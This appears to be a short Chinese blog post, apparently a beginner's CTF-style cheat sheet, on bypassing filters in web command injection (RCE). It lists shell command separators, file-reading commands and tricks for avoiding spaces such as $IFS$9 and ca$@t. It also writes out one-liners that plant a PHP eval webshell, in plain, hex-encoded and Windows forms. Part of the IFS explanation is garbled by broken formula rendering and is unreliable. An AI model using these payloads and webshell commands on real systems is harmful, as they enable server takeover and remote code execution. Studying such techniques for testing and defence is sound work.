简单的RCE注入攻击

@简单的RCE总结

首先:Command Injection 是web程序对用户提交数据检测不严格造成的命令攻击。与sql注入攻击一样都会造成很大的危害。–走向一个安全小白的总结之路

一些绕过总结

  1. 命令连接符

    1. “;”:执行完前面的语句再执行后面的语句。
    2. “|”:显示后面语句的执行结果。
    3. “||”:当前面的语句执行出错时,执行后面的语句。
    4. “&”:两条命令都执行,如果前面的语句为假则执行执行后面的语句,前面的语句可真可假。
    5. “&&”:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句为真则两条命令都执行,前面的语句只能为真。
    6. %0a“这个为url编码的换行符,不能在linux下直接使用需要通过php环境下”(在过滤掉前面几种后可以考虑);
  2. 查看文件内容的命令

    1. “cat" 由第一行开始显示,并将所有内容输出。
    2. “tac”与cat相反,从最后一行开始逐行输出。
    3. “more” 就是我们管道中常用的分页显示。
    4. “head”可以显示文本内容的前几行
    5. “tail”显示末尾几行
    6. “nl”与cat -n 命令一样,输出内容并显示行号 ;
  3. 通过命令行编写webshell

    1. “linux":echo “<?php eval(@\$_POST['pass']);?>” > webshell.php;
    2. echo 3c3f7068706576616c2840245f504f53545b2270617373225d293b3f3e|xxd -r -ps > webshell.php//与上一种异曲同工,知识转成了16进制 |xxd是将16进制转回去
    3. windos下:“echo ^<?php eval($_POST[pass]); ?^> > webshell.php”
  4. 不适用空格的姿势

    1. “{ls,-a}"
    2. “<”:ls<-a
    3. I F S : 借 众 博 主 的 解 释 : IFS:借众博主的解释: IFS:IFS在linux下表示分隔符,但是如果单纯的cat I F S 2 , b a s h 解 释 器 会 把 整 个 I F S 2 当 做 变 量 名 , 所 以 导 致 输 不 出 来 结 果 , 然 而 如 果 加 一 个 就 固 定 了 变 量 名 , 同 理 在 后 面 加 个 IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,然而如果加一个{}就固定了变量名,同理在后面加个 IFS2,bashIFS2可以起到截断的作用,但是为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。
    4. 使用环境变量:shell=KaTeX parse error: Undefined control sequence: \x at position 2: '\̲x̲20123';\x20是空格。…(find flag*).
5.**当过滤大部分操时候** 
		1. 可以使用$@,例如:ca$@t flag
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值